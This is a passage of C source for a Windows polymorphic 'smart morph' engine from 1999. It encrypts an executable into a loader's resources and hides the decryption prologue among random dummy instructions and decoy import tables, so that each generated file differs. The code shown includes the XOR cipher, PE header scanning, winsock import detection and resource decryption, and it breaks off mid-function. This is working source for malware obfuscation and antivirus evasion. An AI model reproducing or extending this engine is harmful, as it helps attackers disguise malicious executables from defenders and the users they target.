/*
  smart morph engine
  written by alexander yaworsky
  september '99
  MUST BE REWRITTEN
  a) code generation: use more instructions with random immediate values
  b) don't keep large instruction table, be more clever
  c) don't determine structure of executable first
  d) improve linker: add sections/imports/etc/link(and build relocations)
  ---
  bug? don't use large max/min dummy counts; itable only is used
*/

//#define TEST

#include <windows.h>

#include "sm.h"
#include "paths.h"
#include "resource.h"
#include "stdlib.h"
#include "switches.h"

#define PEFHDROFFSET(a) ((LPVOID)((BYTE *)a +  \
    ((PIMAGE_DOS_HEADER)a)->e_lfanew + 4))
#define OPTHDROFFSET(a) ((LPVOID)((BYTE *)a                 + \
    ((PIMAGE_DOS_HEADER)a)->e_lfanew + 4 + \
    sizeof (IMAGE_FILE_HEADER)))
#define SECHDROFFSET(a) ((LPVOID)((BYTE *)a                 + \
    ((PIMAGE_DOS_HEADER)a)->e_lfanew + 4 + \
    sizeof (IMAGE_FILE_HEADER) + 224))


/*
  Executable file, which uses SmartMorph technology, consists of two main
  parts: loader and executable.
  Executable is attached to loader as resource and is encrypted.
  Loader contains code that loads executable and decrypts it. This code
  is also encrypted with the same key. To decrypt that code, loader
  contains several instructions dissolved in randomly-generated code.
  Executable also contains original loader attached as resource which is used
  to generate new SmartMorph executable file.
  To decipher itself, executable locates key and resource type and id at the
  entry point of loader (loader puts itself these values there).
*/

#define MODF_EAX       1
#define MODF_EDX       2
#define MODF_ECX       4
#define MODF_EBX       8
#define MODF_ESI      16
#define MODF_EDI      32
#define MODF_EBP      64
#define MODF_FLAGS   128

typedef struct TagINSTRUCTION { // structure is used to keep instruction
  BYTE   Sz;         // size of instruction
  BYTE   ModFlag;    // modification flag
  BYTE   Instr[16];  // instruction
} INSTRUCTION;

typedef struct TagINSTRUCTION2 { //contains additional data for code generation
  INSTRUCTION  Instr;     // standard data
  BYTE         Type;      // type of instruction
  BYTE         Value;     // aux. value
  DWORD        IP;        // instruction pointer where instr. will be placed
} INSTRUCTION2;

// instruction types
#define I2T_REGULAR   0   // regular instruction, no additional value
#define I2T_JUMPDEST  1   // Value contains 1-based index of destination
#define I2T_CALLDEST  2   // Value contains 1-based entry index in prologue
                          // import table
#define I2T_CBEGIN    3   // Value contains offset in the instruction
                          // where Code_Begin offset of loader must be placed
#define I2T_XOR       4   // Value contains  1-based xor value idx (1-a,2-b,..)
                          // which instruction must contain

typedef struct TagIMPORTENTRY { // import table element
  char  Module[ 16 ];
  char  Function[ 64 ];
//??  DWORD JumpOffset;         // jmp offset in the import-jump-table
} IMPORTENTRY;

typedef struct TagLOADERDATA {
  INSTRUCTION  *ITable;     // table with dummy instructions
  int          ICount;      // total instructions in table
  INSTRUCTION  *ITable2;    // table with dummy instr-ns which need to be relocated
  int          ICount2;     // total instructions in table2
  int          MaxInstrSz;  // maximum instruction size for both itables
  INSTRUCTION2 *Prologue;   // code that deciphers loader
  int          PCount;      // total instructions in prologue
  IMPORTENTRY  *PImps;      // prologue import table 
  int          PImpCount;   // number of entries in the prologue import table
  BYTE         *LCode;      // loader code
  DWORD        LSize;       // loader size
  DWORD        *WsImps;     // winsock import ordinals table
  DWORD        WsImpCount;  // number of entries

  // these fields are used internally while scanning loader data
  BYTE         *pLdrCodeSection; // loader code in exe
  BYTE         *pWsImps;    // winsock imports
  BYTE         *pITable;    // pointer to raw instruction table
  BYTE         *pITable2;   // pointer to raw instruction table2
  BYTE         *pProlog;    // pointer to raw prologue code
  char         *pImpCallDest;// pointer to raw prologue import call destinations
  BYTE         *pPDesc;     // pointer to prologue description table
  BYTE         *pCodeBeginDesc;// pointer to code-begin-place table
  BYTE         *pLCode;     // pointer to loader code
  DWORD        *pXorLocs;   // pointer to xor locations table
  DWORD        *pJumpFixups;// pointer to jump fixups table
  int          JFCount, CBCount;
} LOADERDATA;

#define MAX_RESOURCE_TYPES  5       // dummy resource count and size
#define MAX_RESOURCE_COUNT  5
#define MAX_RESOURCE_SIZE   2048

#define MODULE_COUNT     5   // kernel, user, gdi, advapi, wsock
#define MODULE_KERNEL    0
#define MODULE_USER      1
#define MODULE_GDI       2
#define MODULE_ADVAPI    3
#define MODULE_WINSOCK   4

typedef struct TagEXEDEF {
  DWORD    *DummyCount;   // dummy instruction counts between prolog instr
  DWORD    ExeAddSz;      // size added to resource (executable)
  DWORD    ActualExeSize; // actual size of exe with added garbage
  DWORD    *KernelImpIdx;     // kernel32 import idx table
  DWORD    *UserImpIdx;       // user32 import idx table
  DWORD    *GdiImpIdx;        // gdi32 import idx table
  DWORD    *AdvapiImpIdx;     // advapi32 import idx table
  DWORD    *WinsockImpNames;  // table with winsock import names (DWORDs)
  DWORD    ReqKernelImpCount; // required import count from kernel32
  DWORD    ReqUserImpCount;   // required import count from user32
  DWORD    KernelImpCount;    // size of kernel32 import idx table
  DWORD    UserImpCount;      // size of user32 import idx table
  DWORD    GdiImpCount;       // size of gdi32 import idx table
  DWORD    AdvapiImpCount;    // size of advapi32 import idx table
  DWORD    WinsockImpCount;   // size of wsock32 import table
  DWORD    *RequiredWsImpNames;// points to executable image, used temporary
  DWORD    RequiredWsImpCount;
  BOOL     PutModulesTogether;// determines a way how to build imp table
  BOOL     SplitNameAddr;     // split name and address tables for one module
  DWORD    CodeSectionSz;     // size of code section
  char     *CodeSectionName;  // name of code section
  DWORD    CodeSectionVA;     // virtual address of code section
  DWORD    DataSectionSz;     // size of data section
  char     *DataSectionName;  // name of data section
  DWORD    DataSectionVA;     // virtual address of data section
  DWORD    BssSectionSz;      // size of bss section
  char     *BssSectionName;   // name of bss section
  DWORD    BssSectionVA;      // virtual address of bss section
  DWORD    RdataSectionSz;    // size of readonly data section
  DWORD    RdataSectionVA;    // virtual address of readonly data section
  DWORD    IdataSectionSz;    // size of idata section
  DWORD    IdataSectionVA;    // virtual address of idata section
  DWORD    RsrcSectionSz;     // size of rsrc section
  DWORD    RsrcSectionVA;     // virtual address of rsrc section
  DWORD    RelocSectionSz;    // size of reloc section
  DWORD    RelocSectionVA;    // virtual address of reloc section
  DWORD    RsrcTypeCount;     // resource type count will be attached to exe
  DWORD    RsrcType[ MAX_RESOURCE_TYPES ];  // resource types
  DWORD    RsrcCount[ MAX_RESOURCE_TYPES ]; // # of resources of each type
  DWORD    RsrcId[ MAX_RESOURCE_TYPES ][ MAX_RESOURCE_COUNT ]; // res. ids
  DWORD    RsrcSize[ MAX_RESOURCE_TYPES ][ MAX_RESOURCE_COUNT ]; // res. sizes
  DWORD    ExeResType;        // resource type for executable attachment
  DWORD    ExeResId;          // resource id for executable attachment
  DWORD    RsrcTotal;         // total number of resources
  BYTE     *CodeBuf;          // buffer to generate code
  BYTE     *IdataBuf;         // buffer to generate import section
  BYTE     *RsrcBuf;          // buffer to generate resource section
  BYTE     *RelocBuf;         // buffer to generate relocation table
  BYTE     *HdrBuf;           // 4K buffer for file header
  DWORD    XorValues[4];
  DWORD    ModuleCount;       // import modules - total
  DWORD    ModuleOrder[ MODULE_COUNT ];
  char     *ModuleName[ MODULE_COUNT ];
  DWORD    *ModuleImp[ MODULE_COUNT ];
  DWORD    ModuleImpCount[ MODULE_COUNT ];
  char     **ModuleFunc[ MODULE_COUNT ];
  DWORD    DataRelocations;   // relocations in data section
  DWORD    NumberOfSections;
  DWORD    SizeOfImage;
  DWORD    SectionOrder;

  // the next fields are set by code generator
  DWORD    EntryPoint;        // offset of entry point
  DWORD    RelocBufIdx;       // index in RelocBuf
  DWORD    RelocLastVA;       // virtual address of last block
  DWORD    RelocBlockStart;   // index in RelocBuf of the beginning of block
  DWORD    JumpTableOffset;   // immediately follows loader code
} EXEDEF;


#define IMAGE_BASE    0x400000;


//#ifdef TEST                    // dummy instruction counts
#  define MIN_DUMMY_COUNT    8        // define small values in debug version
#  define MAX_DUMMY_COUNT    32
//#else
//#  define MIN_DUMMY_COUNT    256
//#  define MAX_DUMMY_COUNT    512
//#endif

#define MAX_EXE_ADD           65536   // maximum dummy data added to executable
#define MIN_DATA_SECTION_SZ   700
#define MAX_DATA_SECTION_SZ   10000
#define MIN_BSS_SECTION_SZ    700
#define MAX_BSS_SECTION_SZ    10000
#define MIN_RDATA_SECTION_SZ  200
#define MAX_RDATA_SECTION_SZ  1000

#define MAX_SECTIONS       7
#define SECTION_DATA       1
#define SECTION_RDATA      2
#define SECTION_BSS        3
#define SECTION_IMPORT     4
#define SECTION_RELOC      5
#define SECTION_RESOURCE   6

#define RELOC_NUM     1  // these values define percent of instructions in
#define RELOC_DENOM   4  // loader code from itable2, they need to be relocated
#define DATARELOC_NUM     1
#define DATARELOC_DENOM  80

static char* CodeSecNames[] = { ".text", "AUTO", "CODE" };
#define CODE_SEC_NAMES_COUNT (sizeof(CodeSecNames)/sizeof(CodeSecNames[0]))

static char* DataSecNames[] = { ".data", "DATA", "DGROUP" };
#define DATA_SEC_NAMES_COUNT (sizeof(DataSecNames)/sizeof(DataSecNames[0]))

static char* BssSecNames[] = { ".bss", "BSS" };
#define BSS_SEC_NAMES_COUNT (sizeof(BssSecNames)/sizeof(BssSecNames[0]))

static char IdataSecName[] = ".idata";
static char RdataSecName[] = ".rdata";
static char RelocSecName[] = ".reloc";
static char RsrcSecName[] = ".rsrc";


// some kernel32 functions

static char* Kernel32Func[] = {"AllocConsole","Beep","BuildCommDCBA",
     "BuildCommDCBAndTimeoutsA","CallNamedPipeA","ClearCommBreak","ClearCommError",
     "CloseHandle","ConnectNamedPipe","CopyFileA","CreateConsoleScreenBuffer",
     "CreateDirectoryA","CreateEventA","CreateFileA","CreateFileMappingA",
     "CreateMutexA","CreateNamedPipeA","CreatePipe","CreateProcessA","CreateSemaphoreA",
     "CreateThread","DeleteAtom","DeleteCriticalSection","DeleteFileA","DeviceIoControl",
     "DisconnectNamedPipe","DosDateTimeToFileTime","DuplicateHandle","EnterCriticalSection",
     "ExitProcess","ExitThread","FileTimeToDosDateTime","FileTimeToLocalFileTime",
     "FileTimeToSystemTime","FindClose","FindFirstFileA","FindNextFileA","FindResourceA",
     "FindResourceExA","FreeConsole","FreeLibrary","FreeResource","GetACP",
     "GetCPInfo","GetCommConfig","GetCommMask","GetCommState","GetCommTimeouts",
     "GetCommandLineA","GetConsoleCP","GetConsoleMode","GetConsoleOutputCP","GetConsoleTitleA",
     "GetCurrencyFormatA","GetCurrentDirectoryA","GetCurrentProcess","GetCurrentProcessId",
     "GetCurrentThread","GetCurrentThreadId","GetDateFormatA","GetDiskFreeSpaceA",
     "GetDriveTypeA","GetEnvironmentStringsA","GetEnvironmentVariableA",
     "GetExitCodeProcess","GetExitCodeThread","GetFileAttributesA","GetFileSize",
     "GetFileTime","GetFileType","GetFullPathNameA","GetLastError","GetLocalTime",
     "GetLocaleInfoA","GetLogicalDriveStringsA","GetLogicalDrives","GetModuleFileNameA",
     "GetModuleHandleA","GetNamedPipeInfo","GetPriorityClass","GetProcAddress",
     "GetStdHandle","GetSystemDirectoryA","GetSystemInfo","GetSystemTime","GetTempPathA",
     "GetThreadPriority","GetTickCount","GetVersionExA","GetWindowsDirectoryA",
     "GlobalAlloc","GlobalFree","GlobalHandle","GlobalLock","GlobalReAlloc","GlobalSize",
     "GlobalUnlock","InitializeCriticalSection","InterlockedDecrement","InterlockedExchange",
     "InterlockedIncrement","LeaveCriticalSection","LoadLibraryA","LoadModule",
     "LoadResource","LocalFileTimeToFileTime","LockFile","MapViewOfFile","MoveFileA",
     "OpenEventA","OpenFileMappingA","OpenMutexA","OpenProcess","OpenSemaphoreA",
     "PeekConsoleInputA","PurgeComm","ReadConsoleA","ReadConsoleInputA","ReadConsoleOutputA",
     "ReadFile","ReleaseMutex","ReleaseSemaphore","RemoveDirectoryA","ResetEvent",
     "ResumeThread","SetCommMask","SetCommState","SetCommTimeouts","SetConsoleCP",
     "SetConsoleCtrlHandler","SetConsoleCursorPosition","SetConsoleMode","SetConsoleOutputCP",
     "SetConsoleScreenBufferSize","SetConsoleTextAttribute","SetConsoleTitleA",
     "SetCurrentDirectoryA","SetEndOfFile","SetEvent","SetFileAttributesA","SetFilePointer",
     "SetFileTime","SetLocalTime","SetPriorityClass","SetStdHandle","SetThreadPriority",
     "SetupComm","SizeofResource","Sleep","SuspendThread","SystemTimeToFileTime",
     "TerminateProcess","TerminateThread","TlsAlloc","TlsFree","TlsGetValue","TlsSetValue",
     "UnlockFile","UnmapViewOfFile","WaitCommEvent","WaitForMultipleObjects",
     "WaitForSingleObject","WriteConsoleA","WriteConsoleInputA","WriteConsoleOutputA",
     "WriteFile","lstrcmpA", "LocalAlloc", "LocalReAlloc", "LocalFree", "VirtualProtectEx",
     "lstrcmpi" };

#define KERNEL32_FUNC_COUNT (sizeof(Kernel32Func)/sizeof(Kernel32Func[0]))


// some user32 functions

static char* User32Func[] = {"AdjustWindowRect","AppendMenuA","AttachThreadInput",
     "BeginPaint","CallMsgFilterA","CascadeChildWindows","CascadeWindows","ChangeMenuA",
     "CharLowerA","CharToOemA","CharToOemBuffA","CharUpperA","CharUpperBuffA",
     "CheckDlgButton","CheckMenuItem","CheckRadioButton","ChildWindowFromPoint",
     "ClientToScreen","CloseWindow","CopyRect","CreateCursor","CreateIcon","CreateMenu",
     "CreatePopupMenu","CreateWindowExA","DefDlgProcA","DefWindowProcA","DeleteMenu",
     "DestroyCursor","DestroyIcon","DestroyMenu","DestroyWindow","DispatchMessageA",
     "EnableMenuItem","EnableWindow","EndDialog","EndPaint","EnumChildWindows",
     "EnumDesktopWindows","EnumThreadWindows","EnumWindows","ExitWindowsEx","FillRect",
     "FindWindowA","FrameRect","GetActiveWindow","GetClassLongA","GetClientRect",
     "GetCursorPos","GetDC","GetDesktopWindow","GetDlgItem","GetFocus","GetForegroundWindow",
     "GetKeyboardLayout","GetKeyboardState","GetMenu","GetMenuDefaultItem","GetMenuItemCount",
     "GetMenuItemID","GetMenuItemRect","GetMenuState","GetMenuStringA","GetMessageA",
     "GetParent","GetSysColor","GetSystemMenu","GetSystemMetrics","GetTopWindow",
     "GetWindow","GetWindowDC","GetWindowLongA","GetWindowPlacement","GetWindowRect",
     "GetWindowTextA","GetWindowThreadProcessId","InsertMenuA","InsertMenuItemA",
     "InvalidateRect","IsChild","IsDialogMessageA","IsWindow","IsWindowEnabled",
     "IsWindowVisible","IsZoomed","KillTimer","LoadCursorA","LoadIconA","LoadMenuA",
     "LoadStringA","MessageBoxA","ModifyMenuA","MoveWindow","PeekMessageA","PostMessageA",
     "PostQuitMessage","PtInRect","RegisterClassA","RegisterClassExA","ReleaseDC",
     "RemoveMenu","ScreenToClient","ScrollWindow","ScrollWindowEx","SendMessageA",
     "SetActiveWindow","SetClassLongA","SetCursor","SetCursorPos","SetFocus","SetForegroundWindow",
     "SetMenu","SetParent","SetRect","SetScrollInfo","SetScrollPos","SetScrollRange",
     "SetTimer","SetWindowPlacement","SetWindowPos","SetWindowTextA","ShowCursor",
     "ShowOwnedPopups","ShowWindow","TrackPopupMenu","TranslateAcceleratorA","TranslateMessage",
     "UnregisterClassA","UpdateWindow","WaitForInputIdle","WindowFromDC","WindowFromPoint",
     "wsprintfA" };

#define USER32_FUNC_COUNT (sizeof(User32Func)/sizeof(User32Func[0]))


// some gdi32 functions

static char* Gdi32Func[] = { "AnimatePalette","Arc","ArcTo","BeginPath","BitBlt",
     "CreateBitmap","CreateDCA","CreateDIBitmap","CreateFontA","CreatePalette",
     "CreatePen","CreateRectRgn","CreateSolidBrush","DeleteDC","DeleteObject",
     "Ellipse","EnumFontsA","EnumObjects","FillPath","FillRgn","FloodFill","FrameRgn",
     "GetArcDirection","GetBitmapBits","GetBkColor","GetBkMode","GetBoundsRect",
     "GetCharABCWidthsA","GetCharWidth32A","GetDIBits","GetDeviceCaps","GetKerningPairsA",
     "GetMapMode","GetNearestColor","GetObjectA","GetPath","GetPixel","GetPixelFormat",
     "GetRgnBox","GetStockObject","GetSystemPaletteEntries","GetSystemPaletteUse",
     "GetTextAlign","GetTextColor","GetTextMetricsA","GetViewportExtEx","GetViewportOrgEx",
     "GetWindowExtEx","GetWindowOrgEx","GetWorldTransform","LineTo","MoveToEx","PaintRgn",
     "PolyDraw","PtInRegion","RealizePalette","RectVisible","Rectangle","ResizePalette",
     "RestoreDC","SaveDC","SelectObject","SelectPalette","SetBitmapBits","SetBkColor",
     "SetBkMode","SetDIBits","SetDIBitsToDevice","SetMapMode","SetPixel","SetPixelFormat",
     "SetTextAlign","SetTextColor","SetViewportExtEx","SetViewportOrgEx","SetWindowExtEx",
     "SetWindowOrgEx","SetWorldTransform","StretchBlt","StretchDIBits","TextOutA",
     "UnrealizeObject","UpdateColors" };

#define GDI32_FUNC_COUNT (sizeof(Gdi32Func)/sizeof(Gdi32Func[0]))


// some advapi32 functions

static char* Advapi32Func[] = {"RegCloseKey","RegConnectRegistryA","RegCreateKeyA",
     "RegCreateKeyExA","RegDeleteKeyA","RegDeleteValueA","RegEnumKeyA","RegEnumKeyExA",
     "RegEnumValueA","RegFlushKey","RegNotifyChangeKeyValue","RegOpenKeyA","RegOpenKeyExA",
     "RegQueryInfoKeyA","RegQueryValueA","RegQueryValueExA","RegSetValueA","RegSetValueExA"};

#define ADVAPI32_FUNC_COUNT (sizeof(Advapi32Func)/sizeof(Advapi32Func[0]))


#ifdef TEST

  HANDLE  LogH = NULL;
  char    DbgMsg[ 16384 ];
  int     DbgUsage = 0;

  static void DbgOut()
    {
      DWORD   DbgSz;

      if( LogH != NULL )
        WriteFile( LogH, DbgMsg, lstrlen( DbgMsg ), &DbgSz, NULL );
    }

  static BOOL DbgCreateOutput()
    {
      char  *cp;

      if( 0 != DbgUsage++ ) return TRUE;

      // create log file

      if( GetModuleFileName( NULL, DbgMsg, MAX_PATH ) == 0 ) {
        MessageBox( 0, "GetModuleFileName failed", 0, 0 );
        return FALSE;
      }
      cp = Strrchr( DbgMsg, '.' );
      if( cp != NULL ) *cp = '\0';
      lstrcat( DbgMsg, ".log" );
      LogH = CreateFile( DbgMsg, GENERIC_READ | GENERIC_WRITE,
                     0, NULL, OPEN_ALWAYS, 0, NULL );
      if( LogH == INVALID_HANDLE_VALUE ) {
        MessageBox( 0, "CreateFile failed", 0, 0 );
        LogH = NULL;
        return FALSE;
      }
      SetFilePointer( LogH, 0, NULL, FILE_END );
      wsprintf( DbgMsg, "\r\n\r\n***************** log started ************************\r\n\r\n" );
      DbgOut();
      return TRUE;
    }

  static void DbgDestroyOutput()
    {
      if( --DbgUsage == 0 ) { CloseHandle( LogH ); LogH = NULL; }
    }

#endif


static void Crypt( BYTE* p, DWORD s,
                   DWORD val_a, DWORD val_b, DWORD val_c, DWORD val_d )
  {
    DWORD    i, j;

    for( i = 0; i < s - 4; ) {
      *((DWORD*)(p + i)) ^= val_a;
      i++;
      *((DWORD*)(p + i)) ^= val_b;
      i++;
      j = val_b & 1;
      val_b = (val_b >> 1) & 0x7FFFFFFF;
      if( j ) val_b |= 0x80000000;
      *((DWORD*)(p + i)) ^= val_c;
      i++;
      *((DWORD*)(p + i)) ^= val_d;
      i++;
    }
  }


/* Get executable image: if ResId == 0, then get image attached to the loader
   otherwise, get image from resource.
       No problem - simply load resource of current process, because we
       are executing in context of loader, but before we must get
       resource type, id and decryption key from entry point of loader
       (read: current process).
   returns pointer to the data (must be LocalFree-d) or NULL in case of error
*/

static void* GetExecutableImage( DWORD* ImgSize, DWORD ResId )
  {
    void     *p, *Rc, *ibase;
    DWORD    ResType, xor_val_a, xor_val_b, xor_val_c, xor_val_d;
    HRSRC    Rh;
    DWORD    s;

    if( ResId != 0 ) {

#     ifdef TEST
        wsprintf( DbgMsg, "GetExecutableImage: resource id = %d (0x%08X)\r\n", ResId, ResId );
        DbgOut();
#     endif

      p = SM_GetResource( RT_FILE, ResId, &s );
      if( p == NULL ) return NULL;

      // memory allocated with some resource to allow extend image later

      Rc = LocalAlloc( LMEM_FIXED, s + MAX_EXE_ADD );
      if( Rc == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "LocalAlloc failed, last error = %d (0x%08X)\r\n",
                  GetLastError(), GetLastError() );
          DbgOut();
#       endif
        return NULL;
      }

      RtlCopyMemory( Rc, p, s );

      return Rc;
    }


    // ResId == 0 
    // get image base address

#     ifdef TEST
        wsprintf( DbgMsg, "GetExecutableImage: self\r\n" );
        DbgOut();
#     endif

    ibase = (void*) GetModuleHandle( NULL );
    if( ibase == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetModuleHandle( NULL ) returned NULL, last error = %d (0x%08X)\r\n",
                GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return NULL;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "current image base address 0x%08X\r\n", (DWORD) ibase );
      DbgOut();
#   endif


    // get entry point

    p = (void*) (((char*) ibase) +
                 ((IMAGE_OPTIONAL_HEADER*)
                       OPTHDROFFSET( ibase ))->AddressOfEntryPoint);
#   ifdef TEST
      wsprintf( DbgMsg, "DWORD at entry point (%08X): 0x%08X\r\n", p, *((DWORD*) p) );
      DbgOut();
#   endif
    if( *((DWORD*) p) != 0x5A5A5A5A ) {
      // we are operating as regular program and have no attached resources
      ResType = RT_FILE;
      ResId = IDF_EXECUTABLE;
      xor_val_a = 0;
      xor_val_b = 0;
      xor_val_c = 0;
      xor_val_d = 0;
    }
    else {
      // we are operating under loader
      ResType = *((DWORD*) p + 1);
      ResId = *(((DWORD*) p) + 2);
      xor_val_a = *(((DWORD*) p) + 3);  // also the following get xor values
      xor_val_b = *(((DWORD*) p) + 4);
      xor_val_c = *(((DWORD*) p) + 5);
      xor_val_d = *(((DWORD*) p) + 6);
    }
#   ifdef TEST
      wsprintf( DbgMsg, "resource type=%d, id=%d, xor values: a=0x%08X b=0x%08X c=0x%08X d=0x%08X\r\n",
                ResType, ResId, xor_val_a, xor_val_b, xor_val_c, xor_val_d );
      DbgOut();
#   endif


    // get pointer to attached resource and size

    Rh = FindResource( NULL, MAKEINTRESOURCE( ResId ),
                               MAKEINTRESOURCE( ResType ) );
    if( Rh == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "FindResource failed, last error = %d (0x%08X)\r\n",
                GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return NULL;
    }
    p = (void*) LoadResource( NULL, Rh );
    if( p == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "LoadResource failed, last error = %d (0x%08X)\r\n",
                GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return NULL;
    }
    s = SizeofResource( NULL, Rh );
    if( s == 0 ) {
#     ifdef TEST
        wsprintf( DbgMsg, "resource size is zero, last error = %d (0x%08X)\r\n",
                GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return NULL;
    }
    if( ImgSize != NULL ) *ImgSize = s;
#   ifdef TEST
      wsprintf( DbgMsg, "size of resource %d bytes\r\n", s );
      DbgOut();
#   endif


    // allocate memory and decipher resource
    // memory allocated with some resource to allow extend image later

    Rc = LocalAlloc( LMEM_FIXED, s + MAX_EXE_ADD );
    if( Rc == NULL ) {
#     ifdef TEST
        wsprintf( DbgMsg, "LocalAlloc failed, last error = %d (0x%08X)\r\n",
                GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return NULL;
    }

    RtlCopyMemory( Rc, p, s );
    p = Rc;
    Crypt( p, s, xor_val_a, xor_val_b, xor_val_c, xor_val_d );

    return p;
  }


static int  GetICount( BYTE* p )
// returns number of instructions in the table
  {
    int  c;

    for( c = 0; *p != 0; c++ ) p += *p + 2;
    return c;
  }

static int  GetStringCount( char* p )
// returns number of strings in the 0-terminated string table
  {
    int  c;

    for( c = 0; *p != 0; c++ ) p += lstrlen( p ) + 1;
    return c;
  }


/*
  scans image for winsock import function names
*/
static DWORD* GetWinsockImportNames( BYTE* p )
  {
    IMAGE_OPTIONAL_HEADER  *oh;
    IMAGE_SECTION_HEADER   *sh;
    DWORD  iaddr, isize, scount, i, isecva;
    BYTE   *isec;
    
    // get optional header ptr

    oh = (IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p );
    iaddr = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].VirtualAddress;
    isize = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].Size;
#   ifdef TEST
      wsprintf( DbgMsg, "GetWinsockImportNames: optional header at %08X, import table addr 0x%X, size 0x%X\r\n", (unsigned) (((char*) oh) - p), iaddr, isize );
      DbgOut();
#   endif

    // scanning sections for imports

    scount = ((IMAGE_FILE_HEADER*) PEFHDROFFSET( p ))->NumberOfSections;
    sh = (IMAGE_SECTION_HEADER*) SECHDROFFSET( p );
    for( i = 0; i < scount; i++, sh++ ) {
      if( iaddr >= sh->VirtualAddress &&
          iaddr < sh->VirtualAddress + sh->SizeOfRawData ) {
        isec = p + sh->PointerToRawData;
        isecva = sh->VirtualAddress - sh->PointerToRawData;
#       ifdef TEST
          wsprintf( DbgMsg, "GetWinsockImportNames: idata section at %08X\r\n", sh->PointerToRawData );
          DbgOut();
#       endif
      }
    }

    // find winsock imports

    for(;;) {
      if( *(DWORD*)(isec + 12) == 0 ) break;
      i = *(DWORD*)(isec + 12) - isecva;
      if( lstrcmpi( (char*) p + i, "wsock32.dll" ) == 0 ) {
        i = *(DWORD*) isec - isecva;
#       ifdef TEST
          wsprintf( DbgMsg, "GetWinsockImportNames: winsock function names at %08X\r\n", i );
          DbgOut();
#       endif
        return (DWORD*) (p + i);
      }
      isec += 20;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "GetWinsockImportNames: winsock is not used\r\n" );
      DbgOut();
#   endif
    return NULL;
  }


static void ScanLoaderExecutable( BYTE* p, LOADERDATA* Ld )
/*
  Finds code section and winsock import table
*/
  {
    IMAGE_OPTIONAL_HEADER  *oh;
    IMAGE_SECTION_HEADER   *sh;
    DWORD  scount, i;
    DWORD  *wfn;
    
    // we need code and import sections

#   ifdef TEST
      wsprintf( DbgMsg, "  scanning loader executable file:\r\n" );
      DbgOut();
#   endif

    // get optional header ptr

    oh = (IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p );
#   ifdef TEST
      wsprintf( DbgMsg, "    optional header at %08X\r\n", (unsigned) (((char*) oh) - p) );
      DbgOut();
#   endif

    // scanning sections for code and imports

    scount = ((IMAGE_FILE_HEADER*) PEFHDROFFSET( p ))->NumberOfSections;
    sh = (IMAGE_SECTION_HEADER*) SECHDROFFSET( p );
    for( i = 0; i < scount; i++, sh++ ) {
      if( sh->Characteristics & IMAGE_SCN_CNT_CODE ) {
        Ld->pLdrCodeSection = p + sh->PointerToRawData;
#       ifdef TEST
          wsprintf( DbgMsg, "    code section at %08X\r\n", sh->PointerToRawData );
          DbgOut();
#       endif
      }
    }

    // find & count winsock imports

    wfn = GetWinsockImportNames( p );
    for( Ld->WsImpCount = 0; *(wfn + Ld->WsImpCount) != 0; Ld->WsImpCount++ );
#   ifdef TEST
      wsprintf( DbgMsg, "    winsock import entries %d\r\n", Ld->WsImpCount );
      DbgOut();
#   endif

#   ifdef TEST
      wsprintf( DbgMsg, "  done\r\n" );
      DbgOut();
#   endif
  }

static void ScanLoaderCodeSection( LOADERDATA* Ld )
/*
  First pass on loader code - determine locations of loader's tables
*/
  {
    BYTE* p;
    int   i;

    p = Ld->pLdrCodeSection;

#   ifdef TEST
      wsprintf( DbgMsg, "  scanning loader code section:\r\n" );
      DbgOut();
#   endif

    i = 0;
    Ld->pITable = p + 4;
    Ld->ICount = GetICount( Ld->pITable );
#   ifdef TEST
      wsprintf( DbgMsg, "    itable at %08X, %d instructions\r\n", i, Ld->ICount );
      DbgOut();
#   endif

    i += *((DWORD*) p) + 4; // now i is the offset of itable2
    Ld->pITable2 = p + i + 4;
    Ld->ICount2 = GetICount( Ld->pITable2 );
#   ifdef TEST
      wsprintf( DbgMsg, "    itable2 at %08X, %d instructions\r\n", i, Ld->ICount2 );
      DbgOut();
#   endif

    i += *((DWORD*) (p + i)) + 4; // now i is the offs. of prologue
    Ld->pProlog = p + i + 4;
#   ifdef TEST
      wsprintf( DbgMsg, "    prologue at %08X\r\n", i );
      DbgOut();
#   endif

    i += *((DWORD*) (p + i)) + 4; // now i is the offs.of imp.call.dest
    Ld->pImpCallDest = p + i + 4;
    Ld->PImpCount = GetStringCount( Ld->pImpCallDest ) / 2;
#   ifdef TEST
      wsprintf( DbgMsg, "    prologue import call destinations at %08X, %d entries\r\n", i, Ld->PImpCount );
      DbgOut();
#   endif

    i += *((DWORD*) (p + i)) + 4; // now i is the offs.of prologue description table
    Ld->pPDesc = p + i + 4;
    Ld->PCount = *((DWORD*) (p + i)) / 9; // instruction count
#   ifdef TEST
      wsprintf( DbgMsg, "    prologue description at %08X, %d entries (instructions)\r\n", i, Ld->PCount );
      DbgOut();
#   endif

    i += *((DWORD*) (p + i)) + 4; // now i is the offs.of xor locations table
    Ld->pXorLocs = (DWORD*) (p + i);
#   ifdef TEST
      wsprintf( DbgMsg, "    xor locations at %08X\r\n", i );
      DbgOut();
#   endif

    i += 16; // now i is the offset of jump fixups table
    Ld->JFCount = *((DWORD*) (p + i)) / 4;  // entries
    Ld->pJumpFixups = (DWORD*) (p + i + 4);
#   ifdef TEST
      wsprintf( DbgMsg, "    jump fixups at %08X, %d entries\r\n", i, Ld->JFCount );
      DbgOut();
#   endif

    i += *((DWORD*) (p + i)) + 4; // now i is the offs. of OFFSET Code_Begin placements
    Ld->pCodeBeginDesc = p + i + 4;
    Ld->CBCount = *((DWORD*) (p + i)) / 5;  // entries
#   ifdef TEST
      wsprintf( DbgMsg, "    CB locations at %08X, %d entries\r\n", i, Ld->CBCount );
      DbgOut();
#   endif

    i += *((DWORD*) (p + i)) + 4; // now i is the offs. of loader code
    Ld->LSize = *((DWORD*) (p + i)); // size of loader code
    Ld->pLCode = p + ((i + 4 + 3) & ~3); // loader code
#   ifdef TEST
